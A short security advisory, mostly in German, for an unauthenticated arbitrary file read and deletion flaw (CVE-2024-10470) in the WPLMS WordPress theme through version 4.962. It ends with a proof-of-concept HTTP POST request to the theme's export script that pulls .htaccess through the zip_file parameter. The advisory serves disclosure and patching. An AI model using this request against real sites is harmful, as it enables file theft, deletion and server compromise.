
WPLMS Learning Management System für WordPress <= 4.962 – Nicht authentifiziertes beliebiges Lesen und Löschen von Dateien
WPLMS Learning Management System for WordPress <= 4.962 – Nicht authentifiziertes beliebiges Lesen und Löschen von Dateien
Das WPLMS Learning Management System for WordPress, ein WordPress LMS-Theme für WordPress, ist anfällig für beliebiges Lesen und Löschen von Dateien aufgrund unzureichender Dateipfadüberprüfung und Berechtigungsprüfungen in den readfile- und unlink-Funktionen in allen Versionen bis einschließlich 4.962. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien auf dem Server zu löschen, was leicht zu einer Remotecodeausführung führen kann, wenn die richtige Datei gelöscht wird (z. B. wp-config.php). Das Theme ist anfällig, selbst wenn es nicht aktiviert ist.
Affected Theme: WPLMS Learning Management System for WordPress
Theme Slug: wplms
Affected Versions: <= 4.962
CVE ID: CVE-2024-10470
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Foxyyy
Fully Patched Version: 4.963
POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
download_export_zip=1&zip_file=.htaccess